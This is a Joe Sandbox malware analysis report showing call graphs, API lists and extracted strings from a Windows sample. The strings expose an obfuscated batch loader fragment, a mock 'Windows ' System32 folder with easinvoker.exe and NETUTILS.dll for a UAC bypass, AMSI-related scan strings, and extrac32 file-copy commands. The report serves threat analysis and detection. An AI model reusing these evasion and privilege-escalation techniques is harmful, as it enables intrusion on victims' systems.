6906->7555 7085 3256395-3256711 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3232ee0 call 3232f08 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 6907->7085 7086 3256b54-3256cd7 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 6907->7086 7552 3256716-3256781 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7085->7552 7264 3256cdd-3256cec call 32348b0 7086->7264 7265 32574a8-3258b96 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 * 16 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 ExitProcess 7086->7265 7264->7265 7280 3256cf2-3256fc5 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324d198 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3237e18 7264->7280 7685 32572a2-32574a3 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32349bc call 3247f48 7280->7685 7686 3256fcb-325729d call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 7280->7686 7611 3256786-325678d call 3247be8 7552->7611 7652 3255cb5-3255cb8 7555->7652 7653 3255cba-3255f7c call 3245aa8 call 3234b90 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32349bc RtlMoveMemory call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324a1c0 7555->7653 7614 32544da-32544e1 call 3247be8 7556->7614 7621 3256792-32567fd call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7611->7621 7624 32544e6-3254551 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7614->7624 7681 3256802-3256823 call 3247be8 GetCurrentProcess call 3247968 7621->7681 7684 3254556-325455d call 3247be8 7624->7684 7652->7653 8190 3255f81-3255f98 call 32336c4 7653->8190 7704 3256828-3256898 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7681->7704 7696 3254562-3254571 call 32348b0 7684->7696 7685->7265 7686->7685 7716 32547d5-3254840 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7696->7716 7717 3254577-32545e2 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7696->7717 7785 325689d-32568a4 call 3247be8 7704->7785 7802 3254845-325484c call 3247be8 7716->7802 7797 32545e7-32545ee call 3247be8 7717->7797 7799 32568a9-3256914 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7785->7799 7811 32545f3-325465e call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7797->7811 7883 3256919-3256920 call 3247be8 7799->7883 7816 3254851-32548bc call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7802->7816 7895 3254663-325466a call 3247be8 7811->7895 7900 32548c1-32548c8 call 3247be8 7816->7900 7897 3256925-3256990 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7883->7897 7909 325466f-32546da call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7895->7909 7980 3256995-325699c call 3247be8 7897->7980 7914 32548cd-3254938 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7900->7914 7993 32546df-32546e6 call 3247be8 7909->7993 7998 325493d-3254944 call 3247be8 7914->7998 7995 32569a1-32569b4 7980->7995 8008 32546eb-3254756 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7993->8008 8002 32569b6-32569b9 7995->8002 8003 32569bb-3256a3e call 32349bc call 324c5bc call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7995->8003 8013 3254949-32549b4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 7998->8013 8002->8003 8113 3256a43-3256a4a call 3247be8 8003->8113 8091 325475b-3254762 call 3247be8 8008->8091 8096 32549b9-32549c0 call 3247be8 8013->8096 8105 3254767-32547c4 call 3234824 call 3234964 call 3234d38 call 3234da4 call 3234728 8091->8105 8109 32549c5-3254a30 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8096->8109 8169 32547c9-32547d0 call 324c3f8 8105->8169 8179 3254a35-3254a3c call 3247be8 8109->8179 8125 3256a4f-3256aba call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8113->8125 8193 3256abf-3256ac6 call 3247be8 8125->8193 8169->7716 8189 3254a41-3254aac call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8179->8189 8235 3254ab1-3254ab8 call 3247be8 8189->8235 8203 3256acb-3256b36 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8193->8203 8242 3256b3b-3256b4f call 3247be8 EnumSystemLocalesA 8203->8242 8241 3254abd-3254b28 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8235->8241 8268 3254b2d-3254b34 call 3247be8 8241->8268 8242->7086 8272 3254b39-3254bc3 call 3233694 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8268->8272 8300 3254bc8-3254bcf call 3247be8 8272->8300 8304 3254bd4-3254cbc call 3234824 call 3232f08 call 323794c call 32347b0 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8300->8304 8353 3254cc1-3254cc8 call 3247be8 8304->8353 8357 3254ccd-3254d38 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8353->8357 8381 3254d3d-3254d44 call 3247be8 8357->8381 8385 3254d49-3254df0 call 3232f08 call 323794c call 32347b0 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8381->8385 8424 3254df5-3254dfc call 3247be8 8385->8424 8428 3254e01-3254e6c call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8424->8428 8452 3254e71-3254e78 call 3247be8 8428->8452 8456 3254e7d-3254eca call 3234824 call 3234964 call 3234698 8452->8456 8468 3254ecf-3254edc call 3244d90 8456->8468 8471 3254edf-3254ef6 call 32336c4 8468->8471
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 0324C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                      • Part of subcall function 03237E18: GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                    • Sleep.KERNEL32(00001770,UacScan,03295344,03258FEC,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC), ref: 03253094
                                                                                                                                                                                      • Part of subcall function 0324C368: RtlInitUnicodeString.N(?,?,00000000,0324C3E2), ref: 0324C390
                                                                                                                                                                                      • Part of subcall function 0324C368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3A6
                                                                                                                                                                                      • Part of subcall function 0324C368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3C5
                                                                                                                                                                                    • WinExec.KERNEL32 ref: 0325436D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                                                                                    • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
                                                                                                                                                                                    • API String ID: 102611719-2667577771
                                                                                                                                                                                    • Opcode ID: 9046e6aa81d80296df0a4330e8c7ebe00f51d25cfb0ad09897ceb6be4cb312e2
                                                                                                                                                                                    • Instruction ID: 43d4c4fe17c08a13d85aeab03278cea8db493889300bdc33209a09facae346a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9046e6aa81d80296df0a4330e8c7ebe00f51d25cfb0ad09897ceb6be4cb312e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D153FA79B64359CFDB10FB65DC80E9D73B5AB8A214F5081E2A408EB654DBB0AEC1CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03254EFE Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 8890 3254efe-325565b call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 3234964 call 3234698 call 324d318 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 9101 3255661-3255cb3 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32347b0 call 3234964 WinExec call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234964 call 3234698 call 3249e70 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3233694 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 8890->9101 9102 3256190-325638f call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 8890->9102 9665 3255cb5-3255cb8 9101->9665 9666 3255cba-3255f98 call 3245aa8 call 3234b90 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32349bc RtlMoveMemory call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324a1c0 call 32336c4 9101->9666 9220 3256395-32569b4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3232ee0 call 3232f08 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 GetCurrentProcess call 3247968 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 9102->9220 9221 3256b54-3256cd7 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32348b0 9102->9221 9921 32569b6-32569b9 9220->9921 9922 32569bb-3256b4f call 32349bc call 324c5bc call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 EnumSystemLocalesA 9220->9922 9354 3256cdd-3256cec call 32348b0 9221->9354 9355 32574a8-3258b96 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 * 16 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234698 * 2 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 ExitProcess 9221->9355 9354->9355 9367 3256cf2-3256fc5 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324d198 call 3234824 call 3234964 call 3234698 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3237e18 9354->9367 9691 32572a2-32574a3 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 32349bc call 3247f48 9367->9691 9692 3256fcb-325729d call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 324c74c call 32344f4 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 call 3247be8 call 3234da4 * 2 call 3234728 call 324c3f8 9367->9692 9665->9666 9691->9355 9692->9691 9921->9922 9922->9221
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 0324D318: RegOpenKeyA.ADVAPI32(?,00000000,03295798), ref: 0324D35C
                                                                                                                                                                                      • Part of subcall function 0324D318: RegSetValueExA.ADVAPI32(00000510,00000000,00000000,00000001,00000000,0000001C), ref: 0324D394
                                                                                                                                                                                      • Part of subcall function 0324D318: RegCloseKey.ADVAPI32(00000510), ref: 0324D39F
                                                                                                                                                                                    • WinExec.KERNEL32 ref: 032557F9
                                                                                                                                                                                      • Part of subcall function 03249E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 03249F33
                                                                                                                                                                                    • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,03295344,03258FEC,UacScan,03295344,03258FEC,OpenSession,03295344,03258FEC,OpenSession,03295344,03258FEC), ref: 03255D7B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
